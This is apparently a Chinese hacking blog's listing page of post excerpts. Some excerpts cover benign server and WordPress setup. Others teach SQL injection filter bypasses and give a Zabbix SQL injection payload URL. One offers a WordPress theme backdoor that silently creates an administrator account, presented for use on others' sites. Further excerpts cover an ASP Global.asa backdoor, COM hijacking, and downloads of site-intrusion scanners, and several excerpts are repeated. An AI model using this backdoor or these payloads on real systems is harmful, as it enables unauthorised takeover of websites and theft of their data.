前言前面我们学习了如何寻找，确认，利用SQL注入漏洞的技术，本篇文章我将介绍一些更高级的技术，避开过滤，绕开防御。有攻必有防，当然还要来探讨一下SQL注入防御技巧。网站渗透攻防Web篇之SQL注入攻击初级篇网站渗透攻防Web篇之SQL注入攻击中级篇第五节 避开过滤方法总结Web应用为了防御包括SQL注入在内的攻击，常常使用输入过滤器，这些过滤器可以在应用的代码中，也可以通过外部实现，比如Web应用防火墙和入侵防御系统。避开过滤的方法是灵活的，本节我总结了一些常用的技巧。在我们不知道过滤规则的时候可以尝试一下。5.1、大小写变种这种技巧适用于关键字阻塞过滤器不聪明的时候，我们可以变换关键字字符串中字符的大小写来避开过滤，因为使用不区分大小写的方式处理SQL关键字。例如：（下面的代码就是一个简单的关键字阻塞过滤器）function waf($id1){ if(strstr($id1,'union')){ echo 'error:lllegal input'; return; } return $id1;}这段代码的缺陷就在strstr()函数是对大小写敏感的，所以我们可以通过大小写变种来绕过。5.2、URL编码URL编码用途广泛，可以通过它绕过多种类型的输入过滤器。function waf($id1){ if(strstr($id1,' ') || strstr($id1,'/**/' ...继续阅读 (5)

前言回顾前文:网站渗透攻防Web篇之SQL注入攻击初级篇找到SQL注入漏洞后，我们可以用它来干什么呢?那么本篇文章给大家带来的就是SQL注入漏洞利用技术，现在是时候让我们去体验一下漏洞利用的乐趣了。正文第三节 利用SQL注入3.1、识别数据库要想发动SQL注入攻击，就要知道正在使用的系统数据库，不然就没法提取重要的数据。首先从Web应用技术上就给我们提供了判断的线索：ASP和.NET：Microsoft SQL ServerPHP：MySQL、PostgreSQLJava：Oracle、MySQL底层操作系统也给我们提供了线索，比如安装IIS作为服务器平台，后台数据及很有可能是Microsoft SQL Server，而允许Apache和PHP的Linux服务器就很有可能使用开源的数据库，比如MySQL和PostgreSQL。基于错误识别数据库大多数情况下，要了解后台是什么数据库，只需要看一条详细的错误信息即可。比如判断我们事例中使用的数据库，我们加个单引号。error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1从错误信息中，我们就可 ...继续阅读 (3)

前言不管用什么语言编写的Web应用，它们都用一个共同点，具有交互性并且多数是数据库驱动。在网络中，数据库驱动的Web应用随处可见，由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一，这里我想问，我们真的了解SQL注入吗？看完本篇文章希望能让你更加深刻的认识SQL注入。第一节 注入攻击原理及自己编写注入点1.1、什么是SQL？SQL 是一门 ANSI 的标准计算机语言，用来访问和操作数据库系统。SQL 语句用于取回和更新数据库中的数据。SQL 可与数据库程序协同工作，比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。1.2、什么是SQL注入？看起来很复杂，其实很简单就能解释，SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术。1.3、SQL注入是怎么样产生的？构造动态字符串是一种编程技术，它允许开发人员在运行过程中动态构造SQL语句。开发人员可以使用动态SQL来创建通用、灵活的应用。动态SQL语句是在执行过程中构造的，它根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准来决定提取什么字段(如SELECT语句)，或者根据不同的条件来选择不同的查询表时，动态构造SQL语句会非常有用。在PHP中动态构造SQL语句字符串：看上面代码我们可以控制输入 ...继续阅读 (4)

很多情况下我们都有可能会用到Nginx反向代理比如现在大陆全面封禁了谷歌搜索引擎如果你想使用的话就需要翻墙或者如果你网站使用的wordpress环境搭建。那么就很有必要使用Nginx反向代理Gravatar头像服务器了。什么是反向代理，下面是度娘的解释:反向代理（Reverse Proxy）方式是指以代理服务器来接受internet上的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给internet上请求连接的客户端，此时代理服务器对外就表现为一个反向代理服务器。如果你对nginx配置也并不是很了解，可以参考网上相关的文档，实现基本的反向代理还是没有多大问题，下面就来分享一下。此方法适用于军哥的LNMP一键包、AMH主机面板（当然AMH自带了反代模块）下面就开始。server { listen 80; server_name exehack.net www.exehack.net; location / { proxy_pass http://www.baidu.com; proxy_redirect off; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; }}Nginx 反向代理缓存Gravata ...继续阅读 (6)

由于vsftp采用明文传输，用户名密码可通过抓包得到，为了安全性，需使用sftp，锁定目录且不允许sftp用户登到服务器。由于sftp使用的是ssh协议，需保证用户只能使用sftp，不能ssh到机器进行操作，且使用密钥登陆、不是22端口。1. 创建sftp服务用户组,创建sftp服务根目录groupadd sftp#此目录及上级目录的所有者必须为root，权限不高于755，此目录的组最好设定为sftpmkdir /data/sftp chown -R root:sftp /data/sftp chmod -R 0755 /data/sftp2. 修改sshd配置文件cp /etc/ssh/sshd_config,_bk}  #备份配置文件 sed -i 's@#Port 22@Port 22@' /etc/ssh/sshd_config  #保证原来22端口可以vi /etc/ssh/sshd_config注释掉/etc/ssh/sshd_config文件中的此行代码：Subsystem      sftp    /usr/libexec/openssh/sftp-server添加如下代码：Port 2222 Subsystem sftp internal-sftp -l INFO -f AUTH Match Group sftp ChrootDirectory /data/sft ...继续阅读 (4)

让wordpress图片和头像延迟加载的好处就是可以提升部分页面的加载速度，其实可以将静态资源托管到七牛云存储以及使用七牛来缓存静态文件，从而提升网站的速度。关于wordpress图片延迟加载:如果您的文章本身加载了较多或者较大的图片，那么延迟加载图片后首先载入页面，延迟载入图片，从而大大改善访客的体验。关于头像延迟加载：七牛本身具有多个CDN加速节点，速度是很快的，但是将gravatar头像缓存到七牛这个过程可能需要一点时间，如果您的页面中出现从未缓存过的头像可能还是有点慢，那么这篇文章可以很好的解决上面的两个问题。一、添加jquery.lazyload.js 插件首先下载jquery.lazyload.js 插件，将压缩包内的js文件和图片文件全部解压至主题根目录。并将下面的代码添加到主题目录下的footer.php文件中进行引入。<script src="<?php echo get_template_directory_uri(); ?>/jquery.lazyload.min.js" type="text/javascript"></script> <script type="text/javascript"> $(function() { $("img").lazyload({ ...继续阅读 (2)

内存盘这个东东大家应该都知道，内存的读写速度要远远高于硬盘，而我们日常上网浏览器都缓存在硬盘，为了进一步加速，内存盘这个东东就诞生了，虚拟内存大家应该都知道，就是把硬盘的一部分空间划分给内存使用，而内存盘恰恰相反，就是把内存划分出来创建一个新的盘符，这个分区的读写速度极高，大家可以吧日常上网的缓存文件丢进去，例如QQ和浏览器的缓存，今天和大家分享的是软媒魔方的一个小工具，叫做魔方内存盘，如果已经安装过魔方电脑大师的童鞋直接开启此功能就行了，没有的话也没关系，本站制作了单文件版，大小只有271kb，大家下载后即可使用。下面开始讲解如何创建内存盘百度网盘下载地址:http://pan.baidu.com/s/1mhMRzhY提取密码：68h5解压密码:www.exehack.net1、打开魔方内存盘软件，设置虚拟盘的大小等，建议设置大小为512Mb，具体根据你内存大小决定。2、点击创建后，打开“计算机”会出现相应的盘符。如图，是我之前创建的。下面开始教程，下面以谷歌浏览器为例：Chrome浏览器默认的缓存文件位于：C:\Users\登录用户名\AppData\Local\Google\Chrome\User Data\Default\Cache把Cache文件夹 删除(即谷歌浏览器缓存目录)在你想要保存chrome浏览器缓存的地方 建立一个Cache文件夹例如我在F:\Google\C ...继续阅读 (4)

WordPress系统本身自带了多个用户角色等级，方便管理WordPress用户的权限，但是有些时候我们可能就需要修改用户角色名称，甚至是删除或者自己添加对应的用户角色，比如最近在做的一个网站就需要使用到这些，删除一些不常用的，添加一个几乎没有任何权限的用户角色，只是为了展现在前端而已。WordPress用户角色对应的英文名称及默认权限普及介绍1、订阅者（subscriber）：只允许修改自己的个人资料，例如昵称、联系方式、密码等等。2、投稿者（contributor ）：具有订阅者的所有权限。可以发表或删除自己的文章，但所发文章需经管理员审核后才能在博客上显示。可以编辑处于待审中的文章，但对已通过审核的文章不能编辑。也可以查看所有站内评论，但不能对评论进行编辑。3、作者（author）：具有投稿者的所有权限。所发表的文章无需管理员审核即可显示，还可以编辑已通过审核的文章，并且拥有媒体库的使用权限。4、编辑（editor ）：具有作者的所有权限。可以对文章、标签、分类、页面、友情链接、评论进行管理，也可以编辑待审中的文章，但编辑后仍然处于待审状态。实际上，编辑拥有除外观、插件、用户、设置和备份之外所有后台选项的操作权限。5、管理员（administrator ）：是wordpress最重要的角色，也是最高管理者，拥有博客后台的所有操作权限，通常该角色是唯一的。一、WordPress ...继续阅读 (8)

0x01 背景由于默认安装后需要超级管理员权限，故该漏洞很鸡肋，但感觉应该会在其它cms中也存在，所以主要分享下挖掘思路~ PS：使用的测试环境是php5.6(已经移除gpc选项)0x02 漏洞分析漏洞起源： yoursite\phpsso_server\phpcms\modules\admin\system.php下的uc函数：<?php public function uc() { if (isset($_POST['dosubmit'])) { $data = isset($_POST['data']) ? $_POST['data'] : ''; $data['ucuse'] = isset($_POST['ucuse']) && intval($_POST['ucuse']) ? intval($_POST['ucuse']) : 0; $filepath = CACHE_PATH.'configs'.DIRECTORY_SEPARATOR.'system.php'; $config = include $filepath; $uc_config = '<?php '."\ndefine('UC_CONNECT', 'mysql');\n"; ...继续阅读 (10)

漏洞概述zabbix是一个开源的企业级性能监控解决方案。近日，zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞，攻击者无需授权登陆即可登陆zabbix管理系统，也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 但是无需登录注入这里有个前提，就是zabbix开启了guest权限。而在zabbix中，guest的默认密码为空。需要有这个条件的支持才可以进行无权限注入。影响程度攻击成本：低危害程度：高是否登陆：不需要影响版本：2.2.x，3.0.0-3.0.3漏洞插件：Zabbix前台jsrpc.php SQL注入漏洞漏洞测试在zabbix的地址后面添加：利用方式一/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi story.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfil e=true&screenitemid=&period=3600& ...继续阅读 (9)

众所周知：黑客会利用Apache配置的.htaccess文件去覆盖默认的WEB网站的配置，功能大概有以下几点：添加条件重定向创建虚拟路径（mod_rewrite）自动添加PHP脚本......在IIS/ASP的环境中，有个Global.asa文件，这个文件包含了所有asp脚本的共同声明，放在某个ASP应用的根目录。如果该文件存在，该ASP应用会自动包含这个文件。 空白行黑客也喜欢在Global.asa中使用各种.htaccess技巧，比如隐藏恶意内容，之后就会往里面注入大量的空白行。根据Windows浏览文本的特性，粗心的管理还是难以发现的。 文件隐藏属性.htaccess还有另一个属性，那就是它们都是隐藏的。这意味着部分管理员可能不知道他们的存在，除非他们使用显示隐藏文件选项的FTP客户端，或者使用ls -a这类列文件命令参数。尽管Global.asa文件也不方便自动在Windows中隐藏，但黑客们仍然有其他办法。下面的代码节选自创建恶意Global.asa的ASP后门：Public Function createasa(ByVal Content) On Error Resume Next Set fso = Server.CreateObject("scripting.filesystemobject") set f=fso.Getfile("//./" ...继续阅读 (8)

因为网上较多教程是Apache+Tomcat的配置方案，但是我经常要处理php项目，所以简单根据原教程加了PHP支持，使其可以同时支持PHP和JSP程序Apache、Tomcat和PHP就不过多介绍了，直接进入正文安装包下载Apache 2.4：http://httpd.apache.org/download.cgiTomcat 8.0：http://tomcat.apache.org/download-80.cgi#8.0.38JDK 8 ：http://www.oracle.com/technetwork/java/javase/downloads/index.htmlPHP ：http://windows.php.net/qamod_jk.mo 连接包：http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/windows/Apache、Tomcat、JDK、PHP的版本的版本自行选择搭配配置的时候注意一下路径即可，重点是mod_jk.mo要根据Apache选择对版本。我的搭配方案是：Win7 x64 + Apache2.4 + Tomcat8.0 + JDK8 U5 + PHP5.5betamod_jk.mo我选择的是：tomcat-connectors-1.2.36-windows-x86_6 ...继续阅读 (11)

如果你想发布很多的WordPress的内容，将要走也增加了与自然处理的图像数量。图像文件有降低的部位的显示速度的问题。当网站的慢显示速度，可用性降低，撤回速率增加。但是，如果您安装一个插件叫做EWWW图像优化技术，有可能得到的好处，如以下。我们就当自动向上图像压缩文件大小在过去到图像中检测时，文件大小的压缩可以是在一次图像压缩的快速处理由于出版商的提高了工作效率，一个工具，将在各方面的帮助。让我们试着来介绍如何设置和使用的EWWW图像优化的。1。关于如何建立EWWW图像优化安装该插件后，该项目“EWWW图像优化”在管理界面的左侧菜单中的“设置”添加。当你点击这个可以在高级设置屏幕上进行访问。的参数是下列四个折。云设置基本设置高级设置转换设置但所有的英语，我希望你有信心设置，因为只有已经把一张支票在三个地方的评论。转载请注明：小残博客WordPress如何设置和使用EWWW图像优化技术的1-1。云设置（付费选项设置）在这里，你是不是特别需要检查为服务付费的选项。出于安全考虑，不能被引入EWWW图像优化到服务器，或者，要消除的负载，该插件运行的内部服务器，提供了用于一个收费，对于服务器管理员服务。对于大多数人来说，不会有机会成为必要。1-2。基本设置（常规设置）这里，尽量把在“删除元数据”的支票。通过这样做，当你坚持和不必要的票据图像文件，自动为我们去除，所以我们更压缩图像尺寸。其他的 ...继续阅读 (20)

1、HPP HTTP参数污染HTTP参数污染指的是，在URL中提交相同键值的两个参数时，服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准，比如：user.php?id=111&id=222如果输出$_GET数组，则id的值只会取222，即URL上提交的多余值覆盖了前一个值。2、一个CTF题目关于注入的waf绕过，注入点为：$sql="select * from user where id=".$_REQUEST["id"].";";可以看到了REQUEST进行传递，并且存在如下的waf代码：functionwaf($str) {           if(stripos($str,"select")!==false)               die("Be a good person!");           if(stripos($str,"union")!==false)               die("Be a good person!");           ......       }                functionwafArr($arr) {           foreach($arras$k=> $v) {               waf($k);               waf($v);     ...继续阅读 (8)

如果你有持续关注网络安全，DDoS攻击每天都在发生，真正能够震惊全球人民的此类攻击并不多见，不过昨天晚上到今天早晨据说“半个美国互联网”都瘫痪了，就是因为DDoS攻击——Twitter、GitHub、Spotify、Airbnb、Etsy等大量站点都受到影响。SecurityWeek最早发起报道称，Twitter.com在全球部分区域已经无法访问：“到截稿为止，Twitter.com已经下线了大约2个小时。”GitHub方面则很早就已经通知用户，其上游DNS提供商遭遇严重问题。DNS服务遭遇攻击到底是什么样的DDoS攻击能至此种威力？DNS服务提供商Dyn公司的Managed DNS基建据说遭遇了一波非常严重的DDoS攻击（所谓的Managed DNS，实际上也就是购买服务方的DNS服务）。Dyn方面已经确认，攻击者针对其DNS服务的DDoS攻击是从世界标准时间昨天11:10开始发起的，也就是北京时间昨日19:10。目前Dyn方面仍在进行攻击缓解工作。这样一来，很多DNS查询就无法完成了，用户也就无法通过域名访问Twitter、GitHub等站点。受波及的站点还包括PayPal、BBC、华尔街日报、Xbox官网、CNN、HBO Now、星巴克、纽约时报、The Verge、金融时报…可不就是大半个互联网上不去了吗？SecurityAffairs报道称，本次攻击对亚洲和欧洲用户并未造 ...继续阅读 (11)

以前大家是不是总是听说过程序后门啦，网站后门啦之类的。其实只要在你的主题里添加一段代码，你的博客账号，就从此呵呵了。想想太邪恶了，首先我先声明下，我分享的绝无，不信你们自己看，我没那么邪恶的。//一段代码让你的博客从此毫无毫安全感 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '324a37da6577a6319378e23870852fee' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'exehack', 'exehack' ); //默认的后台登录帐号密码:exehack $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }这么一段代码加入主题的functions.php中，对方的网站就无处藏身了。然后，你再加点 ...继续阅读 (16)

网站服务器帐号密码被暴力破解已经不是一个新鲜的话题了,那么我们服务器遭到暴力破解怎么处理?今天小小残就教大家如何防止自己的网站服务器遭到暴力破解。什么是暴力破解？暴力破解或称为穷举法，是一种针对于密码的破译方法，即将密码进行逐个推算直到找出真正的密码为止。例如一个已知是四位并且全部由数字组成的密码，其可能共有10000种组合，因此最多尝试10000次就能找到正确的密码。理论上利用这种方法可以破解任何一种密码，问题只在于如何缩短试误时间。有些人运用计算机来增加效率，有些人辅以字典来缩小密码组合的范围。如防御暴力破解？方法一建议各位用ECS或其他VPS的站长不要将密码长度设置低于12位，同时也要数字、大小写字母、符号，混合组成，保证安全性。优点：不需要操作服务器，可以直接在阿里云等VPS网页改。缺点：如果黑客锲而不舍，早晚都能试出来。方法二将SSH终端服务的端口由22修改为别的端口以防攻击黑客直接猜解您的服务器密码首先修改配置文件vi /etc/ssh/sshd_config找到#Port 22一段，这里是标识默认使用22端口，修改为如下：Port 22 Port 50000然后保存退出执行/etc/init.d/sshd restart这样SSH端口将同时工作与22和50000上。现在编辑防火墙配置：vi /etc/sysconfig/iptables启用50000端口。执行/et ...继续阅读 (8)

一、什么是 Burp SuiteBurp Suite 是用于攻击 web 应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架。Burp Suite 能高效率地与单个工具一起工作，例如：一个中心站点地图是用于汇总收集到的目标应用程序信息，并通过确定的范围来指导单个程序工作。在一个工具处理 HTTP 请求和响应时，它可以选择调用其他任意的 Burp 工具。例如，代理记录的请求可被 Intruder 用来构造一个自定义的自动攻击的准则，也可被 Repeater 用来手动攻击，也可被 Scanner 用来分析漏洞，或者被 Spider(网络爬虫)用来自动搜索内容。应用程序可以是“被动地”运行，而不是产生大量的自动请求。二、Burp ProxyBurp Proxy把所有通过的请求和响应解析为连接和形式，同时站点地图也相应地更新。由于完全的控制了每一个请求，你就可以以一种非入侵的方式来探测敏感的应用程序。当你浏览网页(这取决于定义的目标范围)时，通过自动扫描经过代理的请求就能发现安全漏洞。IburpExtender  是用来扩展 Burp Suite 和单个工具的功能。一个工具处理的数据结果，可以被其他工具随意的使用，并产生相应的结果。三、Burp ...继续阅读 (15)

更新内容:御剑2016最新修正版:修复bug,可查C段,网站入侵必备神器前面文章索引:黑客神器-(御剑1.5修复版带珍藏字典)2014御剑测试版-优化修复C段接口2014御剑测试版-优化修复C段接口第二版一.C段这里重点介绍 C段 和后台扫描 这个后台扫描速度非常快。这个具体取决于自身电脑配置。二.批量注入直接导入网址即可批量查询注入点三.后台扫描直接导入网址即可批量查询后台入口四.MD5解密集合多加MD5解密接口五.多种编码转换支持多种编码格式转换百度网盘下载地址:http://pan.baidu.com/s/1hrPGoF6提取密码：0qcj解压密码:www.exehack.net作者： 小残 绳命不息 |折腾不止 |我一天不折腾心里难受转载请以链接形式注明本文地址：https://www.exehack.net/3926.html版权所有© 小残's Blog – 关注网络安全 | 本网站内容采用BY-NC-SA进行授权。 ...继续阅读 (17)

很多情况下我们不想在友情链接中传递权重,那么就可以为该链接添加nofollow属性的。但是小残觉得在添加链接时,最后还是不要添加nofollow..默认情况下wordpress“链接关系(XFN)”列表中并无 nofollow 选项。如图：那么如何添加 nofollow 选项呢？方法1：直接修改源代码以WordPress 4.5.3为例，编辑/wp-admin/includes/meta-boxes.php，在1145行添加如下代码：<tr> <th scope="row">nofollow</th> <td> <fieldset> <legend class="screen-reader-text"><span> nofollow </span></legend> <label for="nofollow"><input class="valinp" type="checkbox" name="nofollow" value="nofollow" id="nofollow" <?php xfn_check('nofollow'); ?> />nofollow</label> ...继续阅读 (10)

很多情况下我们不想在友情链接中传递权重,那么就可以为该链接添加nofollow属性的。但是小残觉得在添加链接时,最后还是不要添加nofollow..默认情况下wordpress“链接关系(XFN)”列表中并无 nofollow 选项。如图：那么如何添加 nofollow 选项呢？方法1：直接修改源代码以WordPress 4.5.3为例，编辑/wp-admin/includes/meta-boxes.php，在1145行添加如下代码：<tr> <th scope="row">nofollow</th> <td> <fieldset> <legend class="screen-reader-text"><span> nofollow </span></legend> <label for="nofollow"><input class="valinp" type="checkbox" name="nofollow" value="nofollow" id="nofollow" <?php xfn_check('nofollow'); ?> />nofollow</label> ...继续阅读 (20)

WordPress 4.5 下载安装量已经超过 600 万，而本 WordPress 4.5.1 已发布，修复了 WordPress 4.5 以来的12个错误。情景再现早上收到邮件，提示wordpress-4.5.1自动升级失败，只好手动升级了。但是手动升级提示：升级wordpress-4.5.1失败第一个反应是，通过object-cache.php缓存数据库了，所以无法升级。但是把数据库缓存停止了，手动升级依然失败。解决办法这是由于在升级Wordpress时，Wordpress会在数据库wp_options表中增加core_updater.lock记录。如中途打断Wordpress升级，这个记录会留在数据库中。当下次升级时，Wordpress检测到此记录的存在就会返回”另一更新正在进行”。可通过以下方法解决：方法一、通过MySQL数据库管理工具（如 phpMyAdmin），在 wp_options表找到 core_updater.lock记录将这列数据删除。方法二、通过终端登录数据库，假设表前缀是_wp，数据库是wordpress,mysql -u root -p   use wordpress;   select * from wp-options where options_name='core_updater.lock';delete from wp_options whe ...继续阅读 (8)

WordPress 4.5 下载安装量已经超过 600 万，而本 WordPress 4.5.1 已发布，修复了 WordPress 4.5 以来的12个错误。情景再现早上收到邮件，提示wordpress-4.5.1自动升级失败，只好手动升级了。但是手动升级提示：升级wordpress-4.5.1失败第一个反应是，通过object-cache.php缓存数据库了，所以无法升级。但是把数据库缓存停止了，手动升级依然失败。解决办法这是由于在升级Wordpress时，Wordpress会在数据库wp_options表中增加core_updater.lock记录。如中途打断Wordpress升级，这个记录会留在数据库中。当下次升级时，Wordpress检测到此记录的存在就会返回”另一更新正在进行”。可通过以下方法解决：方法一、通过MySQL数据库管理工具（如 phpMyAdmin），在 wp_options表找到 core_updater.lock记录将这列数据删除。方法二、通过终端登录数据库，假设表前缀是_wp，数据库是wordpress,mysql -u root -p   use wordpress;   select * from wp-options where options_name='core_updater.lock';delete from wp_options whe ...继续阅读 (11)

意大利萨尼奥大学（the University of Sannio）的研究团队Iswatlab，证实了打造一个能够规避杀软的恶意程序有多么容易。“编写”一个新的恶意软件，规避杀软或其它防护软件的检测，这很难。但是，“制造”一个能够躲避反恶意软件解决方案的恶意软件，却很简单。“编写”和“制造”的区别就在于，后者一行代码都不用编写，只需要点击一个按钮。萨尼奥大学的研究团队Iswatlab (www.iswatlab.eu)，实现了一个转换移动终端恶意代码的引擎，能够修改代码的外部特征，而不影响恶意程序的行为。他们把这个工具命名为“恶意软件清洗机”（Malware Washing Machine）。该团队研究的Android系统恶意软件转换引擎，可以执行下列变换操作：反汇编和重新汇编重新打包修改包名称重命名标识符数据编码间接调用代码乱序花指令插入复合变换Iswatlab团队使用恶意软件清洗机测试了57个著名的商业反恶意软件解决方案。他们用这个工具修改了5560个恶意软件，这些恶意软件能被要测试的这57个杀软检测出来。在修改之后，大多数杀软都无法检测出大部分恶意软件。“基于特征的检测算法在移动终端上是否有效？我们开发了一个框架，能够对Android应用程序进行细微的变形。接着，我们修改了现实世界中的恶意软件（见https://www.sec.cs.tu-bs.de/~danarp/dreb ...继续阅读 (12)

意大利萨尼奥大学（the University of Sannio）的研究团队Iswatlab，证实了打造一个能够规避杀软的恶意程序有多么容易。“编写”一个新的恶意软件，规避杀软或其它防护软件的检测，这很难。但是，“制造”一个能够躲避反恶意软件解决方案的恶意软件，却很简单。“编写”和“制造”的区别就在于，后者一行代码都不用编写，只需要点击一个按钮。萨尼奥大学的研究团队Iswatlab (www.iswatlab.eu)，实现了一个转换移动终端恶意代码的引擎，能够修改代码的外部特征，而不影响恶意程序的行为。他们把这个工具命名为“恶意软件清洗机”（Malware Washing Machine）。该团队研究的Android系统恶意软件转换引擎，可以执行下列变换操作：反汇编和重新汇编重新打包修改包名称重命名标识符数据编码间接调用代码乱序花指令插入复合变换Iswatlab团队使用恶意软件清洗机测试了57个著名的商业反恶意软件解决方案。他们用这个工具修改了5560个恶意软件，这些恶意软件能被要测试的这57个杀软检测出来。在修改之后，大多数杀软都无法检测出大部分恶意软件。“基于特征的检测算法在移动终端上是否有效？我们开发了一个框架，能够对Android应用程序进行细微的变形。接着，我们修改了现实世界中的恶意软件（见https://www.sec.cs.tu-bs.de/~danarp/dreb ...继续阅读 (5)

前言相隔好几个月，“北极熊”再次更新，像我那么勤快的人好像已经不多见了。。。安全工具，更新频率都不是很高，说实在的一句话，好用就行，本次可以说是大改，以及大量调整，曾经有人反馈，速度不快，容易崩溃的问题等等，当初软件官方发布的时候，默认线程，程序延迟，都不是最佳的，这次呢，干脆放开软件，让他“疯起来”。更新亮点一：网址爬虫开放了一句话木马扫描XSS检测资源探测自定关键字扫描二：更好的网站检测速度三：网站扫描-端口扫描，可直接将扫描结果发送进来，直接进行端口探测软件信息软件名称：北极熊扫描器软件版本：4.0文件大小：8.38MB（安装包）下载地址：http://pan.baidu.com/s/1o8QzBYE密码:2pot官方下载：http://www.im-fox.com/x.rar使用帮助：帮助文档 极熊4.0 分割版本工具是从【北极熊扫描器4.0】当中分割出来的，特点是扫描快速，并且可以导出为电子表格，支持端口扫描，文件仅有：347KB，软件支持线程控制，自动输出等一、导入网址（通过北极熊启动的话可以直接将数据发送到本软件中）二、扫描设定（可以不进行任何改动，注意端口分隔符号）三、点击开始检测【如果增加过多的端口检测扫描速度会变慢哦】四、导出表格五、网段扫描软件信息软件名称：Polar bear 4.0 Scanning tool文件大小：347KB主要功能：网段扫描 ...继续阅读 (7)

前言相隔好几个月，“北极熊”再次更新，像我那么勤快的人好像已经不多见了。。。安全工具，更新频率都不是很高，说实在的一句话，好用就行，本次可以说是大改，以及大量调整，曾经有人反馈，速度不快，容易崩溃的问题等等，当初软件官方发布的时候，默认线程，程序延迟，都不是最佳的，这次呢，干脆放开软件，让他“疯起来”。更新亮点一：网址爬虫开放了一句话木马扫描XSS检测资源探测自定关键字扫描二：更好的网站检测速度三：网站扫描-端口扫描，可直接将扫描结果发送进来，直接进行端口探测软件信息软件名称：北极熊扫描器软件版本：4.0文件大小：8.38MB（安装包）下载地址：http://pan.baidu.com/s/1o8QzBYE密码:2pot官方下载：http://www.im-fox.com/x.rar使用帮助：帮助文档 极熊4.0 分割版本工具是从【北极熊扫描器4.0】当中分割出来的，特点是扫描快速，并且可以导出为电子表格，支持端口扫描，文件仅有：347KB，软件支持线程控制，自动输出等一、导入网址（通过北极熊启动的话可以直接将数据发送到本软件中）二、扫描设定（可以不进行任何改动，注意端口分隔符号）三、点击开始检测【如果增加过多的端口检测扫描速度会变慢哦】四、导出表格五、网段扫描软件信息软件名称：Polar bear 4.0 Scanning tool文件大小：347KB主要功能：网段扫描 ...继续阅读 (4)

打开文件夹就能运行指定的程序？这不是天方夜谭，而是在现实世界中确实存在的。利用本文探讨的COM劫持技术，可以轻松实现出打开文件夹就运行指定代码的功能。对于COM劫持技术，国内很少有资料进行原理阐述，本文结合自身分析经验对COM劫持技术进行归纳总结。同时，希望各大安全厂商针对此类利用做好防护，保护用户信息安全。前言所谓“骂人先骂娘，擒贼先擒王”，首先给出读者最最关心的劫持文件夹的利用方法的效果展示：为了理解本文内容，我们首先要了解COM的一些基本的概念：接口：一组函数的总称，这些函数也被称为”方法”，接口的名称都是以“I”开关，如：”IShellFolder”.接口可以继承。Component object class(coclass)：也就是组件，组件包含在一个DLL或者exe文件中，它包含了一个或多个接口的实现代码。组件实现了它包含的所有接口。COM object：是组件的一个实例。COM server：一个dll或者exe文件，包含了一个或者多个组件。COM library：是操作系统的一部分，负责响应用户程序。GUID：唯一的、128位的标识对象的标识. 全局唯一标识符，是唯一的一个ID，类似于物理网址那样。CLSID：class id，唯一的标识组件。IID：interface id，用来标识接口。 此外，对于windows操作系统，存在着虚拟文件夹，控制面板，我 ...继续阅读 (10)

打开文件夹就能运行指定的程序？这不是天方夜谭，而是在现实世界中确实存在的。利用本文探讨的COM劫持技术，可以轻松实现出打开文件夹就运行指定代码的功能。对于COM劫持技术，国内很少有资料进行原理阐述，本文结合自身分析经验对COM劫持技术进行归纳总结。同时，希望各大安全厂商针对此类利用做好防护，保护用户信息安全。前言所谓“骂人先骂娘，擒贼先擒王”，首先给出读者最最关心的劫持文件夹的利用方法的效果展示：为了理解本文内容，我们首先要了解COM的一些基本的概念：接口：一组函数的总称，这些函数也被称为”方法”，接口的名称都是以“I”开关，如：”IShellFolder”.接口可以继承。Component object class(coclass)：也就是组件，组件包含在一个DLL或者exe文件中，它包含了一个或多个接口的实现代码。组件实现了它包含的所有接口。COM object：是组件的一个实例。COM server：一个dll或者exe文件，包含了一个或者多个组件。COM library：是操作系统的一部分，负责响应用户程序。GUID：唯一的、128位的标识对象的标识. 全局唯一标识符，是唯一的一个ID，类似于物理网址那样。CLSID：class id，唯一的标识组件。IID：interface id，用来标识接口。 此外，对于windows操作系统，存在着虚拟文件夹，控制面板，我 ...继续阅读 (9)

有时候你会发现，你在搜索引擎输入网站名称的时候，出来的网站信息是你们的，但是域名却是一个陌生的，这种情况可以基本确定网站被镜像了，那么究竟什么叫网站被镜像？恶意镜像，也叫恶意克隆，恶意解析，是指有人通过域名A记录直接解析别人IP地址，从而得到一个在访问者眼中完全相同网站的过程。其工作原理基本上是这样子的：有用户访问镜像站点时，程序就会来正版的站点查询数据，并修改相关链接然后呈献给用户，实质上还是在读取原站的数据。严谨一点的解释：通过复制整个网站或部分网页内容并分配以不同域名和服务器，以此欺骗搜索引擎对同一站点或同一页面进行多次索引的行为 。网站被镜像的危害通俗的讲，恶意镜像者意图利用自己有一定权重的域名进行威压，通过某些手段复制了你的站点，除了域名不一样之外，其他内容一模一样，用户或许根本无法分辨。甚至对于一些新的站点，搜索引擎都会迷惑到底哪个是真的站点，那么就有可能正牌的网站被删除收录，而盗版的却被搜索引擎青睐。虽然目前我们还不知道恶意镜像我们的网站到底有什么意图，但肯定对我们没什么好处，如果他这个域名有点什么不健康的信息，那么我们被镜像的站点有可能被污染掉，所以还是要警惕这个现象。 如何知道自己的网站是否被镜像复制自己网站的完整标题（PS：查看自己站点首页源码，其中<title>小残博客– 关注网络安全</title>），然后在谷歌 ...继续阅读 (23)